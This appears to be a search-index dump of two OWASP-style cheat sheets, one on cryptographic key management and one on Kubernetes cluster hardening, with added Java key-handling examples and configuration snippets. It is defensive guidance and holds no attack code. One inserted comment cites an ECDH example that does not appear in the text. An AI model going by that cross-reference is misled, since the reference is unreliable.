There are a diverse set of key types and certificates to consider, for example:

  1. Encryption: Symmetric encryption keys, Asymmetric encryption keys (public and private).
  2. Authentication of End Devices: Pre-shared symmetric keys, Trusted certificates, Trust Anchors.
  3. Data Origin Authentication: HMAC.
  4. Integrity Protection: Message Authentication Codes (MACs).
  5. Key Encryption Keys.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#algorithms-and-protocols","title":"Algorithms and Protocols","text":"

According to NIST SP 800-57 Part 1, many algorithms and schemes that provide a security service use a hash function as a component of the algorithm.

Hash functions can be found in digital signature algorithms (FIPS186), Keyed-Hash Message Authentication Codes (HMAC) (FIPS198), key-derivation functions/methods (NIST Special Publications (SP) 800-56A, 800-56B, 800-56C and 800-108), and random number generators (NIST SP 800-90A). Approved hash functions are defined in FIPS180.

NIST SP 800-57 Part 1 recognizes three basic classes of approved cryptographic algorithms: hash functions, symmetric-key algorithms and asymmetric-key algorithms. The classes are defined by the number of cryptographic keys that are used in conjunction with the algorithm.

The NSA released a report, Commercial National Security Algorithm Suite 2.0, which lists the cryptographic algorithms that are expected to remain strong even with advances in quantum computing.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#cryptographic-hash-functions","title":"Cryptographic hash functions","text":"

Cryptographic hash functions do not require keys. Hash functions generate a relatively small digest (hash value) from a (possibly) large input in a way that is fundamentally difficult to reverse (i.e., it is hard to find an input that will produce a given output). Hash functions are used as building blocks for key management, for example,

  1. To provide data authentication and integrity services (Section 4.2.3) \u2013 the hash function is used with a key to generate a message authentication code.
  2. To compress messages for digital signature generation and verification (Section 4.2.4).
  3. To derive keys in key-establishment algorithms (Section 4.2.5).
  4. To generate deterministic random numbers (Section 4.2.7).
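
For illustration only, here is a minimal sketch (not part of the original cheat sheet; class name and input string are arbitrary) of computing a digest with the JDK's MessageDigest class:

import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Base64;

class DigestExample {
    public static void main(String[] args) throws Exception {
        // SHA-256 is an approved hash function (FIPS 180-4)
        MessageDigest digest = MessageDigest.getInstance("SHA-256");
        byte[] hash = digest.digest("message to protect".getBytes(StandardCharsets.UTF_8));
        // A plain hash provides no origin authentication by itself;
        // combine it with a key (e.g. HMAC) for message authentication
        System.out.println(Base64.getEncoder().encodeToString(hash));
    }
}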
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#symmetric-key-algorithms","title":"Symmetric-key algorithms","text":"

Symmetric-key algorithms (sometimes known as secret-key algorithms) transform data in a way that is fundamentally difficult to undo without knowledge of a secret key. The key is \"symmetric\" because the same key is used for a cryptographic operation and its inverse (e.g., encryption and decryption).

Symmetric keys are often known by more than one entity; however, the key shall not be disclosed to entities that are not authorized access to the data protected by that algorithm and key. Symmetric key algorithms are used, for example,

  1. To provide data confidentiality (Section 4.2.2); the same key is used to encrypt and decrypt data.
  2. To provide authentication and integrity services (Section 4.2.3) in the form of Message Authentication Codes (MACs); the same key is used to generate the MAC and to validate it. MACs normally employ either a symmetric key-encryption algorithm or a cryptographic hash function as their cryptographic primitive.
  3. As part of the key-establishment process (Section 4.2.5).
  4. To generate deterministic random numbers (Section 4.2.7).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#asymmetric-key-algorithms","title":"Asymmetric-key algorithms","text":"

Asymmetric-key algorithms, commonly known as public-key algorithms, use two related keys (i.e., a key pair) to perform their functions: a public key and a private key. The public key may be known by anyone; the private key should be under the sole control of the entity that \"owns\" the key pair. Even though the public and private keys of a key pair are related, knowledge of the public key does not reveal the private key. Asymmetric algorithms are used, for example,

  1. To compute digital signatures (Section 4.2.4).
  2. To establish cryptographic keying material (Section 4.2.5).
  3. To generate random numbers (Section 4.2.7).
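
As a brief illustration (an assumed example, not from the cheat sheet), an asymmetric key pair can be generated with the JDK's KeyPairGenerator; the curve choice mirrors the ECDH example earlier in this document:

import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.spec.ECGenParameterSpec;

class KeyPairExample {
    public static void main(String[] args) throws Exception {
        // Generate a public/private key pair on the NIST P-256 curve
        KeyPairGenerator generator = KeyPairGenerator.getInstance("EC");
        generator.initialize(new ECGenParameterSpec("secp256r1"));
        KeyPair keyPair = generator.generateKeyPair();
        // The public key may be shared freely; the private key must remain
        // under the sole control of the entity that owns the key pair
        System.out.println(keyPair.getPublic());
    }
}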
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#message-authentication-codes-macs","title":"Message Authentication Codes (MACs)","text":"

Message Authentication Codes (MACs) provide data authentication and integrity. A MAC is a cryptographic checksum on the data that is used in order to provide assurance that the data has not changed and that the MAC was computed by the expected entity.

Although message integrity is often provided using non-cryptographic techniques known as error detection codes, these codes can be altered by an adversary to effect an action to the adversary's benefit. The use of an approved cryptographic mechanism, such as a MAC, can alleviate this problem.

In addition, the MAC can provide a recipient with assurance that the originator of the data is a key holder (i.e., an entity authorized to have the key). MACs are often used to authenticate the originator to the recipient when only those two parties share the MAC key.
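
A minimal HMAC sketch using the JDK's Mac class is shown below (illustrative only; key handling is simplified and the names are arbitrary):

import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import javax.crypto.KeyGenerator;
import javax.crypto.Mac;
import javax.crypto.SecretKey;

class MacExample {
    public static void main(String[] args) throws Exception {
        // The MAC key must only be shared with parties authorized to compute/verify the MAC
        SecretKey macKey = KeyGenerator.getInstance("HmacSHA256").generateKey();

        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(macKey);
        byte[] tag = mac.doFinal("data to protect".getBytes(StandardCharsets.UTF_8));

        // The recipient recomputes the tag with the same key and compares it in constant time
        Mac verifier = Mac.getInstance("HmacSHA256");
        verifier.init(macKey);
        byte[] expected = verifier.doFinal("data to protect".getBytes(StandardCharsets.UTF_8));
        System.out.println("MAC valid: " + MessageDigest.isEqual(tag, expected));
    }
}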

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#digital-signatures","title":"Digital Signatures","text":"

Digital signatures are used to provide authentication, integrity and non-repudiation. Digital signatures are used in conjunction with hash functions and are computed on data of any length (up to a limit that is determined by the hash function).

FIPS186 specifies algorithms that are approved for the computation of digital signatures.
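
For example, a short sketch (assumed, not from the cheat sheet) of signing and verifying data with SHA256withECDSA, one of the FIPS 186 approved schemes available through the JDK's Signature class:

import java.nio.charset.StandardCharsets;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.spec.ECGenParameterSpec;

class SignatureExample {
    public static void main(String[] args) throws Exception {
        KeyPairGenerator generator = KeyPairGenerator.getInstance("EC");
        generator.initialize(new ECGenParameterSpec("secp256r1"));
        KeyPair keyPair = generator.generateKeyPair();

        byte[] data = "document to sign".getBytes(StandardCharsets.UTF_8);

        // Sign with the private key
        Signature signer = Signature.getInstance("SHA256withECDSA");
        signer.initSign(keyPair.getPrivate());
        signer.update(data);
        byte[] signature = signer.sign();

        // Verify with the corresponding public key
        Signature verifier = Signature.getInstance("SHA256withECDSA");
        verifier.initVerify(keyPair.getPublic());
        verifier.update(data);
        System.out.println("Signature valid: " + verifier.verify(signature));
    }
}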

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-encryption-keys","title":"Key Encryption Keys","text":"

Symmetric key-wrapping keys are used to encrypt other keys using symmetric-key algorithms. Key-wrapping keys are also known as key encrypting keys.
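
A small illustrative sketch of key wrapping with the JCA follows (an assumed example; in practice the KEK would live in an HSM or key vault rather than being generated in application code):

import java.security.Key;
import java.util.Arrays;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;

class KeyWrapExample {
    public static void main(String[] args) throws Exception {
        KeyGenerator keyGen = KeyGenerator.getInstance("AES");
        keyGen.init(256);
        // Key-wrapping key (KEK): must be at least as strong as the keys it protects
        SecretKey kek = keyGen.generateKey();
        // Data-encryption key to be protected for storage or distribution
        SecretKey dataKey = keyGen.generateKey();

        // Wrap (encrypt) the data key under the KEK using the AES key-wrap algorithm
        Cipher wrapCipher = Cipher.getInstance("AESWrap");
        wrapCipher.init(Cipher.WRAP_MODE, kek);
        byte[] wrappedKey = wrapCipher.wrap(dataKey);

        // Later, unwrap (decrypt) the stored key with the same KEK
        Cipher unwrapCipher = Cipher.getInstance("AESWrap");
        unwrapCipher.init(Cipher.UNWRAP_MODE, kek);
        Key recovered = unwrapCipher.unwrap(wrappedKey, "AES", Cipher.SECRET_KEY);
        System.out.println(Arrays.equals(recovered.getEncoded(), dataKey.getEncoded()));
    }
}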

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-strength","title":"Key Strength","text":"

Review NIST SP 800-57 (Recommendation for Key Management) for recommended guidelines on key strength for specific algorithm implementations. Also, consider these best practices:

  1. Establish what the application's minimum computational resistance to attack should be. Understanding the minimum computational resistance to attack should take into consideration the sophistication of your adversaries, how long data needs to be protected, where data is stored and if it is exposed. Identifying the computational resistance to attack will inform engineers as to the minimum length of the cryptographic key required to protect data over the life of that data. Consult NIST SP 800-131a for additional guidance on determining the appropriate key lengths for the algorithm of choice.
  2. When encrypting keys for storage or distribution, always encrypt a cryptographic key with another key of equal or greater cryptographic strength.
  3. When moving to Elliptic Curve-based algorithms, choose a key length that meets or exceeds the comparative strength of other algorithms in use within your system. Refer to NIST SP 800-57 Table 2.
  4. Formulate a plan for the overall organization's cryptographic strategy to guide developers working on different applications and ensure that each application's cryptographic capability meets minimum requirements and best practices.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#memory-management-considerations","title":"Memory Management Considerations","text":"

Keys stored in memory for a long time can become \"burned in\". This can be mitigated by splitting the key into components that are frequently updated (see NIST SP 800-57).

Plan for the loss or corruption of the memory media on which keys and/or certificates are stored, and for their recovery, according to NIST SP 800-57.

Plan for the recovery from possible corruption of the memory media necessary for key or certificate generation, registration, and/or distribution systems, subsystems, or components, as recommended in NIST SP 800-57.
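
As a small illustration of limiting how long raw key material lingers in memory, here is a hedged sketch (class and method names are arbitrary, not from the cheat sheet) that zeroizes a temporary key buffer and attempts best-effort destruction of a SecretKey:

import java.util.Arrays;
import javax.crypto.SecretKey;
import javax.crypto.spec.SecretKeySpec;
import javax.security.auth.DestroyFailedException;

class KeyHygieneExample {

    // Build a SecretKey from raw bytes, then wipe the temporary buffer
    // (SecretKeySpec keeps its own internal copy of the key material)
    static SecretKey toSecretKey(byte[] rawKey) {
        try {
            return new SecretKeySpec(rawKey, "AES");
        } finally {
            Arrays.fill(rawKey, (byte) 0);
        }
    }

    // Best-effort destruction: destroy() is optional and many providers do not implement it
    static void discard(SecretKey key) {
        try {
            key.destroy();
        } catch (DestroyFailedException e) {
            // Key material may remain in memory until garbage collected
        }
    }
}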

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#perfect-forward-secrecy","title":"Perfect Forward Secrecy","text":"

Ephemeral keys can provide perfect forward secrecy protection, which means that a compromise of the server's long-term signing key does not compromise the confidentiality of past sessions. Refer to the TLS Cheat Sheet.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-usage","title":"Key Usage","text":"

According to NIST, in general, a single key should be used for only one purpose (e.g., encryption, authentication, key wrapping, random number generation, or digital signatures).

There are several reasons for this:

  1. The use of the same key for two different cryptographic processes may weaken the security provided by one or both of the processes.
  2. Limiting the use of a key limits the damage that could be done if the key is compromised.
  3. Some uses of keys interfere with each other. For example, the length of time for which a key may be required differs for each use and purpose, and retention requirements for the data may differ for different data types.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#cryptographic-module-topics","title":"Cryptographic Module Topics","text":"

According to NIST SP 800-133, a cryptographic module is the set of hardware, software, and/or firmware that implements security functions (including cryptographic algorithms and key generation) and is contained within the cryptographic module boundary to provide protection of the keys.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-management-lifecycle-best-practices","title":"Key Management Lifecycle Best Practices","text":""},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#generation","title":"Generation","text":"

Cryptographic keys shall be generated within a cryptographic module with at least FIPS 140-2 compliance. For explanatory purposes, consider the cryptographic module in which a key is generated to be the key-generating module.

Any random value required by the key-generating module shall be generated within that module; that is, the Random Bit Generator that generates the random value shall be implemented within the FIPS 140-2 compliant cryptographic module that generates the key.

Hardware cryptographic modules are preferred over software cryptographic modules for protection.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#distribution","title":"Distribution","text":"

The generated keys shall be transported (when necessary) using secure channels and shall be used by their associated cryptographic algorithm within at least FIPS 140-2 compliant cryptographic modules. For additional detail on the recommendations in this section, refer to NIST Special Publication 800-133.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#storage","title":"Storage","text":"
  1. Developers must understand where cryptographic keys are stored within the application. Understand what memory devices the keys are stored on.
  2. Keys must be protected on both volatile and persistent memory, ideally processed within secure cryptographic modules.
  3. Keys should never be stored in plaintext format.
  4. Ensure all keys are stored in a cryptographic vault, such as a hardware security module (HSM) or isolated cryptographic service.
  5. If you are planning on storing keys in offline devices/databases, then encrypt the keys using Key Encryption Keys (KEKs) prior to the export of the key material. KEK length (and algorithm) should be equivalent to or greater in strength than the keys being protected.
  6. Ensure that keys have integrity protections applied while in storage (consider dual-purpose algorithms that support encryption and Message Authentication Codes (MACs)).
  7. Ensure that standard application-level code never reads or uses cryptographic keys in any way; use key management libraries instead.
  8. Ensure that key storage and cryptographic operations are done inside the sealed vault.
  9. All work should be done in the vault (such as key access, encryption, decryption, signing, etc).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#escrow-and-backup","title":"Escrow and Backup","text":"

Data that has been encrypted with lost cryptographic keys will never be recovered. Therefore, it is essential that the application incorporate a secure key backup capability, especially for applications that support data at rest encryption for long-term data stores.

When backing up keys, ensure that the database that is used to store the keys is encrypted using at least a FIPS 140-2 validated module. It is sometimes useful to escrow key material for use in investigations and for re-provisioning of key material to users in the event that the key is lost or corrupted.

Never escrow keys used for performing digital signatures, but consider the need to escrow keys that support encryption. Oftentimes, escrow can be performed by the Certificate Authority (CA) or key management system that provisions certificates and keys, however in some instances separate APIs must be implemented to allow the system to perform the escrow for the application.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#accountability-and-audit","title":"Accountability and Audit","text":"

Accountability involves the identification of those that have access to, or control of, cryptographic keys throughout their lifecycles. Accountability can be an effective tool to help prevent key compromises and to reduce the impact of compromises once they are detected.

Although it is preferred that no humans are able to view keys, as a minimum, the key management system should account for all individuals who are able to view plaintext cryptographic keys.

In addition, more sophisticated key-management systems may account for all individuals authorized to access or control any cryptographic keys, whether in plaintext or ciphertext form.

Accountability provides three significant advantages:

  1. It aids in the determination of when the compromise could have occurred and what individuals could have been involved.
  2. It tends to protect against compromise, because individuals with access to the key know that their access to the key is known.
  3. It is very useful in recovering from a detected key compromise to know where the key was used and what data or other keys were protected by the compromised key.

Certain principles have been found to be useful in enforcing the accountability of cryptographic keys. These principles might not apply to all systems or all types of keys.

Some of the principles that apply to long-term keys controlled by humans include:

  1. Uniquely identifying keys.
  2. Identifying the key user.
  3. Identifying the dates and times of key use, along with the data that is protected.
  4. Identifying other keys that are protected by a symmetric or private key.

Two types of audit should be performed on key management systems:

  1. The security plan and the procedures that are developed to support the plan should be periodically audited to ensure that they continue to support the Key Management Policy (NIST SP 800-57 Part 2).
  2. The protective mechanisms employed should be periodically reassessed with respect to the level of security that they provide and are expected to provide in the future, and that the mechanisms correctly and effectively support the appropriate policies.

New technology developments and attacks should be taken into consideration. On a more frequent basis, the actions of the humans that use, operate and maintain the system should be reviewed to verify that the humans continue to follow established security procedures.

Strong cryptographic systems can be compromised by lax and inappropriate human actions. Highly unusual events should be noted and reviewed as possible indicators of attempted attacks on the system.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-compromise-and-recovery","title":"Key Compromise and Recovery","text":"

The compromise of a key has the following implications:

  1. In general, the unauthorized disclosure of a key used to provide confidentiality protection (i.e., via encryption) means that all information encrypted by that key could be exposed or known by unauthorized entities. The disclosure of a Certificate Authority's private signature key means that an adversary can create fraudulent certificates and Certificate Revocation Lists (CRLs).
  2. A compromise of the integrity of a key means that the key is incorrect - either that the key has been modified (either deliberately or accidentally), or that another key has been substituted; this includes a deletion (non-availability) of the key. The substitution or modification of a key used to provide integrity calls into question the integrity of all information protected by the key. This information could have been provided by, or changed by, an unauthorized entity that knows the key. The substitution of a public or secret key that will be used (at a later time) to encrypt data could allow an unauthorized entity (who knows the decryption key) to decrypt data that was encrypted using the encryption key.
  3. A compromise of a key's usage or application association means that the key could be used for the wrong purpose (e.g., for key establishment instead of digital signatures) or for the wrong application, and could result in the compromise of information protected by the key.
  4. A compromise of a key's association with the owner or other entity means that the identity of the other entity cannot be assured (i.e., one does not know who the other entity really is) or that information cannot be processed correctly (e.g., decrypted with the correct key).
  5. A compromise of a key's association with other information means that there is no association at all, or the association is with the wrong \"information\". This could cause the cryptographic services to fail, information to be lost, or the security of the information to be compromised. The effect is similar to ransomware, except that you cannot pay the ransom and get the key back. Certain protective measures may be taken in order to minimize the likelihood or consequences of a key compromise.

The following procedures are usually involved:

  1. Limiting the amount of time a symmetric or private key is in plaintext form.
  2. Preventing humans from viewing plaintext symmetric and private keys.
  3. Restricting plaintext symmetric and private keys to physically protected containers. This includes key generators, key-transport devices, key loaders, cryptographic modules, and key-storage devices.
  4. Using integrity checks to ensure that the integrity of a key or its association with other data has not been compromised. For example, keys may be wrapped (i.e., encrypted) in such a manner that unauthorized modifications to the wrapping or to the associations will be detected.
  5. Employing key confirmation (see NIST SP 800-57 Part 1 Section 4.2.5.5) to help ensure that the proper key was, in fact, established.
  6. Establishing an accountability system that keeps track of each access to symmetric and private keys in plaintext form.
  7. Providing a cryptographic integrity check on the key (e.g., using a MAC or a digital signature).
  8. The use of trusted timestamps for signed data.
  9. Destroying keys as soon as they are no longer needed.
  10. Creating a compromise-recovery plan, especially in the case of a CA compromise.

A compromise-recovery plan is essential for restoring cryptographic security services in the event of a key compromise. A compromise-recovery plan shall be documented and easily accessible.

The compromise-recovery plan should contain:

  1. The identification and contact info of the personnel to notify.
  2. The identification and contact info of the personnel to perform the recovery actions.
  3. The re-key method.
  4. An inventory of all cryptographic keys and their use (e.g., the location of all certificates in a system).
  5. The education of all appropriate personnel on the recovery procedures.
  6. An identification and contact info of all personnel needed to support the recovery procedures.
  7. Policies that key-revocation checking be enforced (to minimize the effect of a compromise).
  8. The monitoring of the re-keying operations (to ensure that all required operations are performed for all affected keys).
  9. Any other recovery procedures, which may include:
    1. Physical inspection of the equipment.
    2. Identification of all information that may be compromised as a result of the incident.
    3. Identification of all signatures that may be invalid, due to the compromise of a signing key.
    4. Distribution of new keying material, if required.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#trust-stores","title":"Trust Stores","text":"
  1. Design controls to secure the trust store against injection of third-party root certificates. The access controls are managed and enforced on an entity and application basis.
  2. Implement integrity controls on objects stored in the trust store.
  3. Do not allow for export of keys held within the trust store without authentication and authorization.
  4. Set up strict policies and procedures for exporting key material from applications to network applications and other components.
  5. Implement a secure process for updating the trust store.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#cryptographic-key-management-libraries","title":"Cryptographic Key Management Libraries","text":"

Use only reputable crypto libraries that are well maintained and updated, as well as tested and validated by third-party organizations (e.g., NIST/FIPS).

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#documentation","title":"Documentation","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html","title":"Kubernetes Security Cheat Sheet","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes","title":"Kubernetes","text":"

Kubernetes is an open source container orchestration engine for automating deployment, scaling, and management of containerized applications. The open source project is hosted by the Cloud Native Computing Foundation (CNCF).

When you deploy Kubernetes, you get a cluster. A Kubernetes cluster consists of a set of worker machines, called nodes, that run containerized applications. The control plane manages the worker nodes and the Pods in the cluster.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#control-plane-components","title":"Control Plane Components","text":"

The control plane's components make global decisions about the cluster, as well as detecting and responding to cluster events. It consists of components such as kube-apiserver, etcd, kube-scheduler, kube-controller-manager and cloud-controller-manager.

kube-apiserver: exposes the Kubernetes API. The API server is the front end for the Kubernetes control plane.
etcd: a consistent and highly-available key-value store used as Kubernetes' backing store for all cluster data.
kube-scheduler: watches for newly created Pods with no assigned node, and selects a node for them to run on.
kube-controller-manager: runs controller processes. Logically, each controller is a separate process, but to reduce complexity, they are all compiled into a single binary and run in a single process.
cloud-controller-manager: lets you link your cluster into your cloud provider's API, and separates out the components that interact with that cloud platform from components that just interact with your cluster."},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#node-components","title":"Node Components","text":"

Node components run on every node, maintaining running pods and providing the Kubernetes runtime environment. It consists of components such as kubelet, kube-proxy and container runtime.

kubelet: an agent that runs on each node in the cluster. It makes sure that containers are running in a Pod.
kube-proxy: a network proxy that runs on each node in your cluster, implementing part of the Kubernetes Service concept.
Container runtime: the software that is responsible for running containers.

This cheatsheet provides a starting point for securing a Kubernetes cluster. It is divided into the following categories:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-kubernetes-hosts","title":"Securing Kubernetes hosts","text":"

There are several options available to deploy Kubernetes: on bare metal, on-premise, and in the public cloud (custom Kubernetes build on virtual machines OR use a managed service). Kubernetes was designed to be highly portable and customers can easily switch between these installations, migrating their workloads.

All of this potential customization of Kubernetes means it can be designed to fit a large variety of scenarios; however, this is also its greatest weakness when it comes to security. Kubernetes is designed out of the box to be customizable and users must turn on certain functionality to secure their cluster. This means that the engineers responsible for deploying the Kubernetes platform need to know about all the potential attack vectors and vulnerabilities that poor configuration can lead to.

It is recommended to harden the underlying hosts by installing the latest version of the operating system, hardening the operating system, implementing necessary patch and configuration management systems, implementing essential firewall rules and undertaking specific security measures depending on the datacenter environment.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-version","title":"Kubernetes Version","text":"

It has become impossible to track all potential attack vectors. This fact is unfortunate, as there is nothing more vital than being aware of and staying on top of potential threats. The best defense is to make sure that you are running the latest available version of Kubernetes.

The Kubernetes project maintains release branches for the most recent three minor releases and it backports the applicable fixes, including security fixes, to those three release branches, depending on severity and feasibility. Patch releases are cut from those branches at a regular cadence, plus additional urgent releases, when required. Hence it is always recommended to upgrade the Kubernetes cluster to the latest available stable version. It is recommended to refer to the version skew policy for further details: https://kubernetes.io/docs/setup/release/version-skew-policy/.

There are several techniques such as rolling updates, and node pool migrations that allow you to complete an update with minimal disruption and downtime.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-kubernetes-components","title":"Securing Kubernetes components","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#control-network-access-to-sensitive-ports","title":"Control network access to sensitive ports","text":"

Kubernetes clusters usually listen on a range of well-defined and distinctive ports which makes it easier to identify the clusters and attack them. Hence it is highly recommended to configure authentication and authorization on the cluster and cluster nodes.

Here is an overview of the default ports used in Kubernetes. Make sure that your network blocks access to these ports and consider limiting access to the Kubernetes API server except from trusted networks.

Master node(s):

TCP 6443: Kubernetes API Server
TCP 2379-2380: etcd server client API
TCP 10250: Kubelet API
TCP 10251: kube-scheduler
TCP 10252: kube-controller-manager
TCP 10255: Read-Only Kubelet API

Worker nodes:

TCP 10250: Kubelet API
TCP 10255: Read-Only Kubelet API
TCP 30000-32767: NodePort Services"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#limit-direct-access-to-kubernetes-nodes","title":"Limit Direct Access to Kubernetes Nodes","text":"

You should limit SSH access to Kubernetes nodes, reducing the risk of unauthorized access to host resources. Instead you should ask users to use \"kubectl exec\", which will provide direct access to the container environment without the ability to access the host.

You can use Kubernetes Authorization Plugins to further control user access to resources. This allows defining fine-grained access control rules for specific namespaces, containers and operations.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#controlling-access-to-the-kubernetes-api","title":"Controlling access to the Kubernetes API","text":"

The Kubernetes platform is controlled using API requests and as such is the first line of defense against attackers. Controlling who has access and what actions they are allowed to perform is the primary concern. For more information, refer to the documentation at https://kubernetes.io/docs/reference/access-authn-authz/controlling-access/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-transport-layer-security","title":"Use Transport Layer Security","text":"

Communication in the cluster between services should be handled using TLS, encrypting all traffic by default. This, however, is often overlooked with the thought being that the cluster is secure and there is no need to provide encryption in transit within the cluster.

Advances in network technology, such as the service mesh, have led to the creation of products like LinkerD and Istio which can enable TLS by default while providing extra telemetry information on transactions between services.

Kubernetes expects that all API communication in the cluster is encrypted by default with TLS, and the majority of installation methods will allow the necessary certificates to be created and distributed to the cluster components. Note that some components and installation methods may enable local ports over HTTP and administrators should familiarize themselves with the settings of each component to identify potentially unsecured traffic.

To learn more on usage of TLS in Kubernetes cluster, refer to the documentation at https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked/#1-tls-everywhere.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#api-authentication","title":"API Authentication","text":"

Kubernetes provides a number of built-in mechanisms for API server authentication; however, these are likely only suitable for non-production or small clusters.

The recommended approach for larger or production clusters is to use an external authentication method:

In addition to choosing the appropriate authentication system, API access should be considered privileged and use Multi-Factor Authentication (MFA) for all user access.

For more information, consult the Kubernetes authentication reference documentation at https://kubernetes.io/docs/reference/access-authn-authz/authentication.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#api-authorization-implement-role-based-access-control","title":"API Authorization - Implement role-based access control","text":"

In Kubernetes, you must be authenticated (logged in) before your request can be authorized (granted permission to access). Kubernetes expects attributes that are common to REST API requests. This means that Kubernetes authorization works with existing organization-wide or cloud-provider-wide access control systems which may handle other APIs besides the Kubernetes API.

Kubernetes authorizes API requests using the API server. It evaluates all of the request attributes against all policies and allows or denies the request. All parts of an API request must be allowed by some policy in order to proceed. This means that permissions are denied by default.

Role-based access control (RBAC) is a method of regulating access to computer or network resources based on the roles of individual users within your organization.

Kubernetes ships an integrated Role-Based Access Control (RBAC) component that matches an incoming user or group to a set of permissions bundled into roles. These permissions combine verbs (get, create, delete) with resources (pods, services, nodes) and can be namespace- or cluster-scoped. A set of out-of-the-box roles is provided that offers reasonable default separation of responsibility depending on what actions a client might want to perform. It is recommended that you use the Node and RBAC authorizers together, in combination with the NodeRestriction admission plugin.

RBAC authorization uses the rbac.authorization.k8s.io API group to drive authorization decisions, allowing you to dynamically configure policies through the Kubernetes API. To enable RBAC, start the API server with the --authorization-mode flag set to a comma-separated list that includes RBAC; for example:

kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options\n
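
As a minimal sketch of how verbs and resources combine into a namespaced role (the role, binding, user, and namespace names below are purely illustrative):

apiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  namespace: team-a\n  name: pod-reader\nrules:\n- apiGroups: [\"\"]\n  resources: [\"pods\"]\n  verbs: [\"get\", \"list\", \"watch\"]\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n  namespace: team-a\n  name: read-pods\nsubjects:\n- kind: User\n  name: jane\n  apiGroup: rbac.authorization.k8s.io\nroleRef:\n  kind: Role\n  name: pod-reader\n  apiGroup: rbac.authorization.k8s.io\n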

For detailed examples of utilizing RBAC, refer to Kubernetes documentation at https://kubernetes.io/docs/reference/access-authn-authz/rbac

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#restrict-access-to-etcd","title":"Restrict access to etcd","text":"

etcd is a critical Kubernetes component which stores information on state and secrets, and it should be protected differently from the rest of your cluster. Write access to the API server's etcd is equivalent to gaining root on the entire cluster, and even read access can be used to escalate privileges fairly easily.

The Kubernetes scheduler will search etcd for pod definitions that do not have a node. It then sends the pods it finds to an available kubelet for scheduling. Validation for submitted pods is performed by the API server before it writes them to etcd, so malicious users writing directly to etcd can bypass many security mechanisms - e.g. PodSecurityPolicies.

Administrators should always use strong credentials from the API servers to their etcd server, such as mutual auth via TLS client certificates, and it is often recommended to isolate the etcd servers behind a firewall that only the API servers may access.
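
As an illustrative sketch (certificate paths are placeholders), mutual TLS between the API server and etcd is typically configured with flags along the following lines:

# kube-apiserver side: present a client certificate that etcd trusts\nkube-apiserver --etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt --etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt --etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key ...\n# etcd side: require client certificates signed by the trusted CA\netcd --client-cert-auth=true --trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt --cert-file=/etc/kubernetes/pki/etcd/server.crt --key-file=/etc/kubernetes/pki/etcd/server.key ...\n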

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#caution","title":"Caution","text":"

Allowing other components within the cluster to access the master etcd instance with read or write access to the full keyspace is equivalent to granting cluster-admin access. Using separate etcd instances for non-master components or using etcd ACLs to restrict read and write access to a subset of the keyspace is strongly recommended.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#controlling-access-to-the-kubelet","title":"Controlling access to the Kubelet","text":"

Kubelets expose HTTPS endpoints which grant powerful control over the node and containers. By default Kubelets allow unauthenticated access to this API. Production clusters should enable Kubelet authentication and authorization.
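
A rough sketch of the relevant kubelet flags (the same settings can also be expressed in the kubelet configuration file; the CA path is a placeholder):

kubelet --anonymous-auth=false --authorization-mode=Webhook --client-ca-file=/etc/kubernetes/pki/ca.crt ...\n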

For more information, refer to Kubelet authentication/authorization documentation at https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/

